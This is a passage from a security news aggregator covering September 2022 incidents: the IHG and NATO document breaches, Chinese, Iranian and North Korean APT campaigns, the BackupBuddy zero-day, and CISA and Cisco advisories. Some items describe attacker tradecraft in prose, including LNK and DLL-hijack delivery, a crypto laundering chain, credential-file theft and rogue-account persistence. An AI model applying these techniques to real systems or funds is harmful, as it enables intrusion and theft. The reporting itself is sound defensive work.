Feed aggregator

IHG suffered a cyberattack that severely impacted its booking process

Security Affairs - Sat, 09/10/2022 - 10:28
InterContinental Hotels Group PLC (IHG) discloses a security breach, parts of its IT infrastructure has been subject to unauthorised activity

The hospitality conglomerate, InterContinental Hotel Group (IHG) manages 17 hotel chains, including the Regent, Crowne Plaza, Holiday Inn, and Candlewood Suites. IHG operates 6,028 hotels in more than 100 different countries.

The company announced that the Holiday Inn Hotel subsidiary of IHG suffered a cyberattack, attackers has access to parts of the company’s technology systems.

The attack significantly disrupted IHG’s booking channels and other applicationsì, a circumstance that suggests that the company was the victim of a ransomware attack. The security breach also impacted the booking process through third-party sites such as Expedia and Booking.com, and the service was intermittently resumed during this week.

“InterContinental Hotels Group PLC (IHG or the Company) reports that parts of the Company’s technology systems have been subject to unauthorised activity.” reads a statement published by the company. “IHG has implemented its response plans, is notifying relevant regulatory authorities and is working closely with its technology suppliers. External specialists have also been engaged to investigate the incident.”

IHG is working to restore its operations and determine the extent and impact of the incident.

The Post reported that some franchisees told them that significant disruptions continued to make the system unavailable as of early Friday.

“Customers who are trying to book rooms can only log onto Holiday Inn’s site and make reservations about half the time, according to Vimal Patel, a franchisee who operates Holiday Inn Express hotels in LaPlace, La. and Donaldsville.” reported The Post.

Follow me on Twitter: @securityaffairs and Facebook

try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {} try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {}

Pierluigi Paganini

(SecurityAffairs – hacking, Log4Shell)

The post IHG suffered a cyberattack that severely impacted its booking process appeared first on Security Affairs.

Categories: Cyber Security News

China-Linked BRONZE PRESIDENT APT targets Government officials worldwide

Security Affairs - Sat, 09/10/2022 - 09:32
China-linked BRONZE PRESIDENT group is targeting government officials in Europe, the Middle East, and South America with PlugX malware.

Secureworks researchers reported that China-linked APT group BRONZE PRESIDENT conducted a new campaign aimed at government officials in Europe, the Middle East, and South America with the PlugX malware.

Attacks part of this campaign were spotted in June and July 2022.

PlugX is modular malware has backdoor capabilities that could be extended by downloading additional plugins.

“Several characteristics of this campaign indicate that it was conducted by the likely Chinese government-sponsored BRONZE PRESIDENT threat group, including the use of PlugX, file paths and naming schemes previously used by the threat group, the presence of shellcode in executable file headers, and politically-themed decoy documents that align with regions where China has interests.” reads the analysis published by Secureworks.

The Bronze President group is targeting political and law enforcement organizations and NGOs in Asia.

The China-based group has been active at least since 2014, it focused on political and law enforcement organizations and NGOs in Asia. The APT group leverages both custom remote access tools and publicly available remote access and post-compromise to compromise target networks.

In the recent campaign, the malware is included in RAR archive files. Once opened the archive, it will displays a Windows shortcut (LNK) file that masquerades as a document. Upon clicking the Windows shortcut file, the malware will be executed. 

The archive also includes a hidden folder that contains the malware, embedded eight levels deep in a sequence of hidden folders named with special characters. The attackers used this trick in an attempt of bypassing mail-scanning products.

The shortcut executes a renamed legitimate file contained in the eighth hidden folder. The attackers also drop a malicious DLL and an encrypted payload file, noticing that the legitimate binary files are vulnerable to DLL search order hijacking.

“When executed, they import the malicious DLL that loads, decrypts, and executes the payload file. In each sample analyzed by CTU researchers, the shortcut file metadata indicates the file was created on a Windows system either with hostname “desktop-n2v1smh” or “desktop-cb248vr”.” continues the report.

“Once running, the payload drops a decoy document to the logged-on user’s %Temp% directory and copies the three files to a ProgramData subdirectory using the pattern “<Application><3 characters>” (e.g., Operavng)”

The researchers recommend organizations in geographic regions of interest to China to monitor the activity of this APT group, they also shared indicators of compromise for this campaign.

“BRONZE PRESIDENT has demonstrated an ability to pivot quickly for new intelligence collection opportunities. Organizations in geographic regions of interest to China should closely monitor this group’s activities, especially organizations associated with or operating as government agencies.” concludes the report.

Follow me on Twitter: @securityaffairs and Facebook

try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {} try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {}

Pierluigi Paganini

(SecurityAffairs – hacking, BRONZE PRESIDENT)

The post China-Linked BRONZE PRESIDENT APT targets Government officials worldwide appeared first on Security Affairs.

Categories: Cyber Security News

Scammers live-streamed on YouTube a fake Apple crypto event

Security Affairs - Sat, 09/10/2022 - 07:25
Scammers live-streamed on YouTube an old interview with Tim Cook as part of a fake Apple crypto event, and tens of thousands of users viewed it.

Cybercriminals were live-streaming on YouTube an old interview with Tim Cook as part of a fake Apple crypto event, and tens of thousands of users viewed it. The interview was transmitted by CNN conducted in 2018.

To deceive the users the scammers filled the title and description with Apple keywords.

“The fake live stream was getting attention by filling its description with an array of Apple keywords in both the title and description. But when you actually opened it up, it was filled with odd messages linking to a shady-looking crypto site.“APPLE CRYPTO EVENT 2022”” reported The Verge.

The scammers covered the CNN logo in the original interview with the text “Apple Crypto Event 2022,” and added Bitcoin and Ethereum logos to the stream. The video also included a bold text reading “URGENT NEWS” at the bottom.

Fake Apple live stream
 Screenshot by Jay Peters / The Verge

The fake live stream was launched while Apple was streaming its big iPhone 14 announcement event in an attempt to catch the attention of the users looking for any video from the IT giant. 

Visiting the channel’s page it is clear that it was hijacked by attackers and used to stream the video.

After The Verge published the news about the fraudulent live stream, YouTube removed the video for violating company terms of service.

“I came upon this stream because it was recommended on my YouTube homepage — that might have been in part because I’ve been watching Apple videos from the event throughout the day.” continues The Verge. “When I first started watching the fake stream, there were around 16K viewers, and right before first publishing this story, that count was nearly 70K.”

The Verge also reported having found another live stream on a separate channel, the stream was advertised as an event featuring Cook and Elon Musk about Apple and the metaverse. In this case the stream was viewed by above 10,000 viewers.

Update September 7th, 10:54PM ET: YouTube has removed the live streams.

Follow me on Twitter: @securityaffairs and Facebook

try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {} try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {}

Pierluigi Paganini

(SecurityAffairs – hacking, scam)

The post Scammers live-streamed on YouTube a fake Apple crypto event appeared first on Security Affairs.

Categories: Cyber Security News

U.S. Imposes New Sanctions on Iran Over Cyberattack on Albania

The Hacker News - Sat, 09/10/2022 - 05:43
The U.S. Treasury Department on Friday announced sanctions against Iran's Ministry of Intelligence and Security (MOIS) and its Minister of Intelligence, Esmaeil Khatib, for engaging in cyber-enabled activities against the nation and its allies. "Since at least 2007, the MOIS and its cyber actor proxies have conducted malicious cyber operations targeting a range of government and private-sector
Categories: Cyber Security News

US Treasury sanctioned Iran ’s Ministry of Intelligence over Albania cyberattack

Security Affairs - Fri, 09/09/2022 - 15:48
The U.S. Treasury Department sanctioned Iran ‘s Ministry of Intelligence and Security (MOIS) and its Minister of Intelligence over the Albania cyberattack.

The U.S. Treasury Department announced sanctions against Iran ‘s Ministry of Intelligence and Security (MOIS) and its Minister of Intelligence over the cyber attack that hit Albania in July.

MOIS is the primary intelligence agency of the Islamic Republic of Iran and a member of the Iran Intelligence Community. It is also known as VAJA and previously as VEVAK (Vezarat-e Ettela’at va Amniyat-e Keshvar) or alternatively MOIS.

Since at least 2007, the MOIS coordinated a series of cyber operation against government entities and private organizations around the world. In January, USCYBERCOM officially linked the Iran-linked MuddyWater APT group (aka SeedWorm and TEMP.Zagros) to Iran’s Ministry of Intelligence and Security (MOIS).

“Today, the U.S. Department of the Treasury’s Office of Foreign Assets Control (OFAC) is designating Iran’s Ministry of Intelligence and Security (MOIS) and its Minister of Intelligence for engaging in cyber-enabled activities against the United States and its allies.” reads the press release of the U.S. Treasury Department. “In July 2022, cyber threat actors assessed to be sponsored by the Government of Iran and MOIS disrupted Albanian government computer systems, forcing the government to suspend online public services for its citizens.”

“Iran’s cyber attack against Albania disregards norms of responsible peacetime State behavior in cyberspace, which includes a norm on refraining from damaging critical infrastructure that provides services to the public,” said Under Secretary of the Treasury for Terrorism and Financial Intelligence Brian E. Nelson. “We will not tolerate Iran’s increasingly aggressive cyber activities targeting the United States or our allies and partners.”  

Albanian Prime Minister Edi Rama this week announced that Albania interrupted diplomatic ties with Iran and expelled the country’s embassy staff over the massive cyber attack that hit the country in mid-July.

The cyberattack hit the servers of the National Agency for Information Society (AKSHI), which handles many government services. Most of the desk services for the population were interrupted, and only several important services, such as online tax filing, were working because they are provided by servers not targeted in the attack. Albania reported the attack to the NATO Member States and other allies.

According to a statement published by the government, the damages may be considered minimal compared to the goals of the threat actors.

The country’s Embassy staff was asked to leave Albany within 24 hours.

The United States government issued a statement condemning Iran for attacking Albania.

“The United States strongly condemns Iran’s cyberattack against our NATO Ally, Albania. We join in Prime Minister Rama’s call for Iran to be held accountable for this unprecedented cyber incident. The United States will take further action to hold Iran accountable for actions that threaten the security of a U.S. ally and set a troubling precedent for cyberspace.” U.S. National Security Council spokesperson Adrienne Watson said. “We have concluded that the Government of Iran conducted this reckless and irresponsible cyberattack and that it is responsible for subsequent hack and leak operations.”

The relations between Albania and Iran have deteriorated since the government of Tirana offered asylum to thousands of Iranian dissidents.

NATO, and the U.K. also formally blamed the Iranian government for the cyberattacks against Albania.

Follow me on Twitter: @securityaffairs and Facebook

try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {} try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {}

Pierluigi Paganini

(SecurityAffairs – hacking, Albania cyberattack)

The post US Treasury sanctioned Iran ’s Ministry of Intelligence over Albania cyberattack appeared first on Security Affairs.

Categories: Cyber Security News

$30 Million worth of cryptocurrency stolen by Lazarus from Axie Infinity was recovered

Security Affairs - Fri, 09/09/2022 - 12:09
US authorities recovered more than $30 million worth of cryptocurrency stolen by the North Korea-linked Lazarus APT from Axie Infinity.

A joint operation conducted by enforcement and leading organizations in the cryptocurrency industry allowed to recover more than $30 million worth of cryptocurrency stolen by North Korean-linked APT group Lazarus from online video game Axie Infinity.

In March, threat actors stole almost $625 million in Ethereum and USDC (a U.S. dollar pegged stablecoin) tokens from Axie Infinity’s Ronin network bridge. The attack took place on March 23rd, but the cyber heist was discovered after a user was unable to withdraw 5,000 ether.

The Ronin Network is an Ethereum-linked sidechain used for the blockchain game Axie Infinity.

The attackers have stolen roughly 173,600 ether and 25.5 million USDC.

According to a post published by Blockchain security firm Chainalysis, its Crypto Incident Response team played a role in these seizures, providing its advanced tracing techniques to follow stolen funds to cash out points. 

“The seizures represent approximately 10% of the total funds stolen from Axie Infinity (accounting for price differences between time stolen and seized), and demonstrate that it is becoming more difficult for bad actors to successfully cash out their ill-gotten crypto gains,” reads a post published by Chainalysis.

A report from The Block published in July and citing two people familiar with the matter revealed that threat actors targeted a senior engineer at the company with a fake job offer via LinkedIn.

The attackers offered a job with an extremely generous compensation package to a Sky Mavis engineer.

A PDF containing the offer was sent to the employee, once opened the file spyware compromised his system and infiltrate Ronin’s network. Once inside the company infrastructure, the threat actors were able to take over four out of nine validators on the Ronin network.

In April, the U.S. government blamed North Korea-linked APT Lazarus for the Ronin Validator cyber heist.

In July, the U.S. Treasury announced in a notice the sanctions against the Ethereum address used by the North Korea-linked APT to receive the stolen funds. US organizations are forbidden to conduct any transactions with the above address.

Chainalysis’s report state that the attack began when the Lazarus Group gained access to five of the nine private keys held by transaction validators for Ronin Network’s cross-chain bridge. Then the APT group used them to approve two transactions, both withdrawals: one for 173,600 ether (ETH) and the other for 25.5 million USD Coin (USDC). Chainalysis began tracing the funds when the group initiated their laundering process. The group has highly sophisticated laundering capabilities, it leveraged over 12,000 different crypto addresses to date.

The DeFi laundering technique usually adopted by Lazarus is composed of five stages: 

  1. Stolen Ether sent to intermediary wallets
  2. Ether mixed in batches using Tornado Cash
  3. Ether swapped for bitcoin
  4. Bitcoin mixed in batches
  5. Bitcoin deposited to crypto-to-fiat services for cashout

This process was also used to launder large portions of Ronin’s stolen funds.

After the U.S. Treasury Department’s Office of Foreign Assets Control (OFAC) sanctioned in August the crypto mixer service Tornado Cash, the Lazarus APT Group started using DeFi services such as crypto bridges to launder the funds.

“Above, we see that the hacker bridged ETH from the Ethereum blockchain to the BNB chain and then swapped that ETH for USDD, which was then bridged to the BitTorrent chain. Lazarus Group carried out hundreds of similar transactions across several blockchains to launder the funds they stole from Axie Infinity, in addition to the more conventional Tornado Cash-based laundering we covered above.” continues the report.

Follow me on Twitter: @securityaffairs and Facebook

try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {} try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {}

Pierluigi Paganini

(SecurityAffairs – hacking, Lazarus)

The post $30 Million worth of cryptocurrency stolen by Lazarus from Axie Infinity was recovered appeared first on Security Affairs.

Categories: Cyber Security News

6 Top API Security Risks! Favored Targets for Attackers If Left Unmanaged

The Hacker News - Fri, 09/09/2022 - 09:30
Security threats are always a concern when it comes to APIs. API security can be compared to driving a car. You must be cautious and review everything closely before releasing it into the world. By failing to do so, you're putting yourself and others at risk. API attacks are more dangerous than other breaches. Facebook had a 50M user account affected by an API breach, and an API data breach on
Categories: Cyber Security News

Experts warn of attacks exploiting zero-day in WordPress BackupBuddy plugin

Security Affairs - Fri, 09/09/2022 - 07:50
Threat actors are exploiting a zero-day vulnerability in a WordPress plugin called BackupBuddy, Wordfence researchers warned.

On September 6, 2022, the Wordfence Threat Intelligence team was informed of a vulnerability being actively exploited in the BackupBuddy WordPress plugin. This plugin allows users to back up an entire WordPress installation, including theme files, pages, posts, widgets, users, and media files.

The vulnerability, tracked as CVE-2022-31474 (CVSS score: 7.5), can be exploited by an unauthenticated user to download arbitrary files from the affected site. It has been estimated that the plugin has around 140,000 active installations.

Wordfence researchers determined that threat actors started exploiting this vulnerability in the wild on August 26, 2022. The security firm also added to have blocked 4,948,926 attacks exploiting this vulnerability since that time.

The attackers were attempting to retrieve sensitive files such as the /wp-config.php and /etc/passwd.

The vulnerability affects versions 8.5.8.0 to 8.7.4.1 and was fixed with the release of version 8.7.5 on September 2, 2022.

The plugin allows storing backup files in multiple locations (Destinations) including Google Drive, OneDrive, and AWS. The plugin also allows storing backups via the ‘Local Directory Copy’ option, but experts discovered that this feature isn’t secure and allows unauthenticated users to download any file stored on the server.

“More specifically the plugin registers an admin_init hook for the function intended to download local back-up files and the function itself did not have any capability checks nor any nonce validation. This means that the function could be triggered via any administrative page, including those that can be called without authentication (admin-post.php), making it possible for unauthenticated users to call the function.” reads the report. “The back-up path is not validated and therefore an arbitrary file could be supplied and subsequently downloaded.”

Due to this vulnerability being actively exploited, and its ease of exploitation, we are sharing minimal details about this vulnerability.

Wordfence did not share additional details about about the flaw because it is easy to exploit.

Follow me on Twitter: @securityaffairs and Facebook

try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {} try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {}

Pierluigi Paganini

(SecurityAffairs – hacking, WordPress)

The post Experts warn of attacks exploiting zero-day in WordPress BackupBuddy plugin appeared first on Security Affairs.

Categories: Cyber Security News

U.S. Seizes Cryptocurrency Worth $30 Million Stolen by North Korean Hackers

The Hacker News - Fri, 09/09/2022 - 07:36
More than $30 million worth of cryptocurrency plundered by the North Korea-linked Lazarus Group from online video game Axie Infinity has been recovered, marking the first time digital assets stolen by the threat actor have been seized. "The seizures represent approximately 10% of the total funds stolen from Axie Infinity (accounting for price differences between time stolen and seized), and
Categories: Cyber Security News

Iran-linked DEV-0270 group abuses BitLocker to encrypt victims’ devices

Security Affairs - Fri, 09/09/2022 - 04:57
Iran-linked APT group DEV-0270 (aka Nemesis Kitten) is abusing the BitLocker Windows feature to encrypt victims’ devices.

Microsoft Security Threat Intelligence researchers reported that Iran-linked APT group DEV-0270 (Nemesis Kitten) has been abusing the BitLocker Windows feature to encrypt victims’ devices.

The researchers tracked multiple ransomware attacks conducted by the DEV-0270 group, which is a unit of the Iranian actor PHOSPHORUS.

The DEV-0270 group exploits high-severity vulnerabilities to gain initial access to devices, it also extensively uses living-off-the-land binaries (LOLBINs) to harvest credentials. The experts observed the abuse of the built-in BitLocker tool to encrypt files on compromised devices.

“In many of the observed DEV-0270 instances, the actor gained access by exploiting known vulnerabilities in Exchange or Fortinet (CVE-2018-13379). For Exchange, the most prevalent exploit has been ProxyLogon—this highlights the need to patch high-severity vulnerabilities in internet-facing devices, as the group has continued to successfully exploit these vulnerabilities even recently, well after updates supplied the fixes.” reads the analysis published by Microsoft. “While there have been indications that DEV-0270 attempted to exploit Log4j 2 vulnerabilities, Microsoft has not observed this activity used against customers to deploy ransomware.”

DEV-0270 usually obtains initial access to administrator or system-level privileges by injecting a web shell into a privileged process on a vulnerable web server, in the alternative, it creates or activates a user account to provide it with administrator privileges.

In some attacks, the time between initial access and the ransom note (aka time to ransom or TTR) was around two days. The group demands USD 8,000 for decryption keys, and in case the victims refuse to pay the ransom, it attempts to monetize its efforts by selling the stolen data.

To maintain persistence in a compromised network, the DEV-0270 APT group adds or creates a new user account (i.e. DefaultAccount with a password of [email protected]). The the attackers modify the registry to allow remote desktop (RDP) connections for the device, adds a rule in the firewall to allow RDP connections, and add the user to the remote desktop users group. The threat actors use scheduled tasks to maintain access to a device.

“DEV-0270 has been seen using setup.bat commands to enable BitLocker encryption, which leads to the hosts becoming inoperable. For workstations, the group uses DiskCryptor, an open-source full disk encryption system for Windows that allows for the encryption of a device’s entire hard drive.” continues the report. “The group drops DiskCryptor from an RDP session and when it is launched, begins the encryption. This method does require a reboot to install and another reboot to lock out access to the workstation.”

Microsoft also provided details about DEV-0270, the group appears to be operated by a company that tracked with two public aliases, Secnerd (secnerd[.]ir) and Lifeweb (lifeweb[.]ir). The researchers observed multiple infrastructure overlaps between DEV-0270 and the two companies. both companies are also linked to Najee Technology Hooshmand (ناجی تکنولوژی هوشمند), located in Karaj, Iran.

The group is typically opportunistic in its targeting, it scans the internet to find vulnerable servers and devices.

Follow me on Twitter: @securityaffairs and Facebook

try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {} try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {}

Pierluigi Paganini

(SecurityAffairs – hacking, PHOSPHORUS)

The post Iran-linked DEV-0270 group abuses BitLocker to encrypt victims’ devices appeared first on Security Affairs.

Categories: Cyber Security News

Hackers Exploit Zero-Day in WordPress BackupBuddy Plugin in ~5 Million Attempts

The Hacker News - Fri, 09/09/2022 - 04:19
A zero-day flaw in a WordPress plugin called BackupBuddy is being actively exploited, WordPress security company Wordfence has disclosed. "This vulnerability makes it possible for unauthenticated users to download arbitrary files from the affected site which can include sensitive information," it said. BackupBuddy allows users to back up their entire WordPress installation from within the
Categories: Cyber Security News

&#x26a0;&#xfe0f; Uwaga na maile od biznes.gov.pl

Niebezpiecznik.pl - Fri, 09/09/2022 - 03:42
Typ ataku: wirus (e-mail) Zagrożenie: Utrata pieniędzy Użyte marki: Rząd RP Na skrzynki Polaków właśnie rozesłano fałszywe e-maile podszywające się pod serwis rządowy biznes.gov.pl. Wiadomość zawiera złośliwy załącznik i następującą treść straszącą konsekwencjami prawnymi: Drogi Użytkowniku! Załącznik to oficjalne powiadomienie elektroniczne od Biznes.gov.pl. Powiadomienie będzie dostępne na Twoim Autoryzowanym Koncie od 09-08-2022 do 09-17-2022. Jeżeli nie […]

CISA adds 12 new flaws to its Known Exploited Vulnerabilities Catalog

Security Affairs - Thu, 09/08/2022 - 18:05
CISA added 12 more security flaws to its Known Exploited Vulnerabilities Catalog including four D-Link vulnerabilities.

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added 12 new vulnerabilities to its Known Exploited Vulnerabilities Catalog, including four vulnerabilities in D-Link routers, two Chrome zero-day issues, and a recently disclosed flaw in the QNAP Photo Station.

According to Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities, FCEB agencies have to address the identified vulnerabilities by the due date to protect their networks against attacks exploiting the flaws in the catalog.

Experts recommend also private organizations review the Catalog and address the vulnerabilities in their infrastructure.

Below is the list of the flaws added to the catalog:

The vulnerabilities in D-Link routers added to the catalog are:

  • CVE-2022-28958 D-Link DIR-816L Remote Code Execution Vulnerability
  • CVE-2022-26258 D-Link DIR-820L Remote Code Execution Vulnerability
  • CVE-2018-6530 D-Link Multiple Routers OS Command Injection Vulnerability
  • CVE-2011-4723 D-Link DIR-300 Router Cleartext Storage of a Password Vulnerability

Last week, Google rolled out emergency fixes to address a vulnerability, tracked as CVE-2022-3075, in the Chrome web browser that is being actively exploited in the wild. Now CISA added this flaw to the Catalog.

CISA also added the CVE-2022-27593 in QNAP NAS appliances to its catalog. This week, the Taiwanese vendor warned its customers of ongoing DeadBolt ransomware attacks that are exploiting a zero-day vulnerability in Photo Station.

CISA orders federal agencies to fix these vulnerabilities by September 29, 2022.

Follow me on Twitter: @securityaffairs and Facebook

try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {} try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {}

Pierluigi Paganini

(SecurityAffairs – hacking, CISA)

The post CISA adds 12 new flaws to its Known Exploited Vulnerabilities Catalog appeared first on Security Affairs.

Categories: Cyber Security News

Classified NATO documents sold on darkweb after they were stolen from Portugal

Security Affairs - Thu, 09/08/2022 - 16:36
Threat actors claimed to have stolen classified NATO documents from the Armed Forces General Staff agency of Portugal (EMGFA).

After discovering that Classified NATO documents belonging to the Armed Forces General Staff agency of Portugal (EMGFA) were offered for sale on the darkweb, the Portuguese agency discovered it has suffered a cyberattack.

The Armed Forces General Staff (Portuguese: Estado-Maior-General das Forças Armadas), or EMGFA, is the supreme military body of Portugal. It is responsible for the planning, command and control of the Portuguese Armed Forces.

“The General Staff of the Armed Forces (EMGFA), commanded by the Chief of Staff, Admiral Silva Ribeiro, was the target of a “prolonged and unprecedented cyberattack” that resulted in the exfiltration of classified NATO documents.” reported the news outlet Diario de Noticias,

Sources of the news agency considered this security breach of extreme gravity, hundreds of Secret and Confidential documents sent by NATO to Portugal are for sale on the darkweb.

“It was a cyberattack prolonged in time and undetectable , through bots programmed to detect this type of documents, which were later removed in several stages”, explained one of these sources.

The threat actors published samples of the stolen documents as proof of the hack.

The documents were spotted by the US Information Services which immediately alerted the U.S. embassy in Lisbon, which warned the Portuguese authorities.

“NATO will have demanded explanations and guarantees from the Portuguese government and, next week, on behalf of António Costa, they should travel to NATO headquarters, in Brussels, for a high-level meeting at the NATO Office of Security, the secretary of State for Digitization and Administrative Modernization , Mário Campolargo, who oversees the GNS, and the Director-General of this Office, Vice Admiral Gameiro Marques , who is responsible for the security of classified information sent to our country.” continues the website

The National Security Office (GNS) and Portugal’s national cybersecurity center launched an investigation into the incident to determine the extent of the data breach.

According to the initial investigation, the documents were exfiltrated from systems in the EMGFA, in the secret military (CISMIL) and in the General Directorate of National Defense Resources.

The investigators discovered that security rules for the transmission of classified documents had been broken, and threat actors were able to access the Integrated System of Military Communications (SICOM) and receive and forward classified documents.

“the exchange of information between allies in terms of Information Security is permanent at the bilateral and multilateral levels. Whenever there is a suspicion of compromise of cybersecurity of Information System networks, the situation is extensively analyzed and all procedures aimed at enhancing cybersecurity awareness and the correct handling of information to deal with new types of threat are implemented. disciplinary and/or criminal law automatically determines the adoption of appropriate procedures.” said the spokeswoman for Prime Minister of Portugal António Costa underlines that

Follow me on Twitter: @securityaffairs and Facebook

try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {} try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {}

Pierluigi Paganini

(SecurityAffairs – hacking, NATO)

The post Classified NATO documents sold on darkweb after they were stolen from Portugal appeared first on Security Affairs.

Categories: Cyber Security News

New Vulnerabilities Reported in Baxter's Internet-Connected Infusion Pumps

The Hacker News - Thu, 09/08/2022 - 13:55
Multiple security vulnerabilities have been disclosed in Baxter's internet-connected infusion pumps used by healthcare professionals in clinical environments to dispense medication to patients. "Successful exploitation of these vulnerabilities could result in access to sensitive data and alteration of system configuration," the U.S. Cybersecurity and Infrastructure Security Agency (CISA) said in
Categories: Cyber Security News

North Korea-linked Lazarus APT targets energy providers around the world

Security Affairs - Thu, 09/08/2022 - 11:12
North Korea-linked Lazarus APT group is targeting energy providers around the world, including organizations in the US, Canada, and Japan.

Talos researchers tracked a campaign, orchestrated by North Korea-linked Lazarus APT group, aimed at energy providers around the world, including organizations in the US, Canada, and Japan. The campaign was observed between February and July 2022. 

The attacks aimed at infiltrating organizations around the world for maintaining long-term access and exfiltrate data from the victims.

“Targeted organizations include energy providers from around the world, including those headquartered in the United States, Canada and Japan.” reads the analysis published by Talos. “The campaign is meant to infiltrate organizations around the world for establishing long term access and subsequently exfiltrating data of interest to the adversary’s nation-state.”

The attack chain observed by the experts starts with the exploitation of vulnerabilities (i.e. Log4j vulnerability) in VMWare products to achieve initial footholds into enterprise networks. Once obtained access to the network, threat actors deployed custom implants tracked as VSingle and YamaBot.

VSingle is an HTTP bot that executes arbitrary code from a remote network. It also downloads and executes plugins. The bot was used to carry out a variety of malicious activities, including reconnaissance, malware deployment, and data exfiltration. YamaBot is a backdoor written in Golang.

The nation-state hackers also employed known malware families, along with the previously unknown malware implant called by Talos “MagicRAT.”

“The main goal of these attacks was likely to establish long-term access into victim networks to conduct espionage operations in support of North Korean government objectives.” continues the report.

The same campaign was partially documented by Symantec and AhnLab earlier this April and May.

Cisco Talos experts observed multiple attacks targeting several victims, they also provided details for two of the most representative ones:

  • Victim 1: Illustrates the kill chain from exploitation to actions on objectives. This intrusion also illustrates the use of the VSingle implant.
  • Victim 2: Represents a kill chain similar to Victim 1 but in this instance, we observed the deployment of a new implant we’re calling “MagicRAT” along with VSingle.

While the infection chain is similar across multiple intrusions in this campaign, there were some key variations that consist of some optional activities conducted by the APT group in different intrusion sets.

Below is the list of variations shared by Talos:

  • Credential harvesting using tools such as Mimikatz and Procdump.
  • Proxy tools to set up SOCKs proxies.
  • Reverse tunneling tools such as PuTTY’s plink.

Follow me on Twitter: @securityaffairs and Facebook

try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {} try { window._mNHandle.queue.push(function (){ window._mNDetails.loadTag("816788371", "300x250", "816788371"); }); } catch (error) {}

Pierluigi Paganini

(SecurityAffairs – hacking, Lazarus APT)

The post North Korea-linked Lazarus APT targets energy providers around the world appeared first on Security Affairs.

Categories: Cyber Security News

Rząd chce, aby sprzedawcy domyślnie instalowali 2 apki od MSWiA na smartfonach Polaków

Niebezpiecznik.pl - Thu, 09/08/2022 - 10:17
Systemy ostrzegania przez zagrożeniami to bardzo ważny element funkcjonowania państwa. Niestety, rząd właśnie wpadł na pomysł, który może zbudować wiele złych skojarzeń wokół, bądź co bądź przydatnego, Regionalnego Systemu Ostrzegania. Dziennikarze radiowi i telewizyjni od wczoraj pytają nas o te kwestie. Postanowiliśmy więc opisać swoje spostrzeżenia w postaci artykułu, aby nasze stanowisko nie rozmyło się […]

North Korean Lazarus Hackers Targeting Energy Providers Around the World

The Hacker News - Thu, 09/08/2022 - 08:20
A malicious campaign mounted by the North Korea-linked Lazarus Group is targeting energy providers around the world, including those based in the United States, Canada, and Japan. “The campaign is meant to infiltrate organizations around the world for establishing long-term access and subsequently exfiltrating data of interest to the adversary’s nation-state,” Cisco Talos said in a report shared
Categories: Cyber Security News

Cisco will not fix the authentication bypass flaw in EoL routers

Security Affairs - Thu, 09/08/2022 - 07:24
Cisco fixed new security flaws affecting its products, including a recently disclosed high-severity issue in NVIDIA Data Plane Development Kit.

The most severe issues fixed by Cisco are an unauthenticated Access to Messaging Services Vulnerability affecting Cisco SD-WAN vManage software and a vulnerability in NVIDIA Data Plane Development Kit.

The two issues have been tracked as CVE-2022-20696 (CVSS score: 7.5) and CVE-2022-28199 (CVSS score: 8.6) respectively.

The CVE-2022-28199 flaw stems from a lack of proper error handling in DPDK’s network stack. An attacker can trigger the flaw to trigger a denial-of-service (DoS) condition potentially impacts data integrity and confidentiality.

“If an error condition is observed on the device interface, the device may either reload or fail to receive traffic, resulting in a denial of service (DoS) condition.” reads the advisory published by Cisco.

The vulnerability affects:

  • Cisco Catalyst 8000V Edge Software
  • Adaptive Security Virtual Appliance (ASAv)
  • Secure Firewall Threat Defense Virtual (formerly FTDv)

The second issue resides in the binding configuration of Cisco SD-WAN vManage Software containers. An unauthenticated, adjacent attacker who has access to the VPN0 logical network can trigger the flaw to access the messaging service ports on an affected system.

“A vulnerability in the binding configuration of Cisco SD-WAN vManage Software containers could allow an unauthenticated, adjacent attacker who has access to the VPN0 logical network to also access the messaging service ports on an affected system.” reads the advisory. “This vulnerability exists because the messaging server container ports on an affected system lack sufficient protection mechanisms. An attacker could exploit this vulnerability by connecting to the messaging service ports of the affected system. To exploit this vulnerability, the attacker must be able to send network traffic to interfaces within the VPN0 logical network. This network may be restricted to protect logical or physical adjacent networks, depending on device deployment configuration. A successful exploit could allow the attacker to view and inject messages into the messaging service, which can cause configuration changes or cause the system to reload.”

For both issues, the PSIRT is not aware of attacks in the wild exploiting these flaws.

Cisco also addressed a medium severity issue, tracked as CVE-2022-20863 (CVSS score: 4.3), in Cisco Webex Meetings App

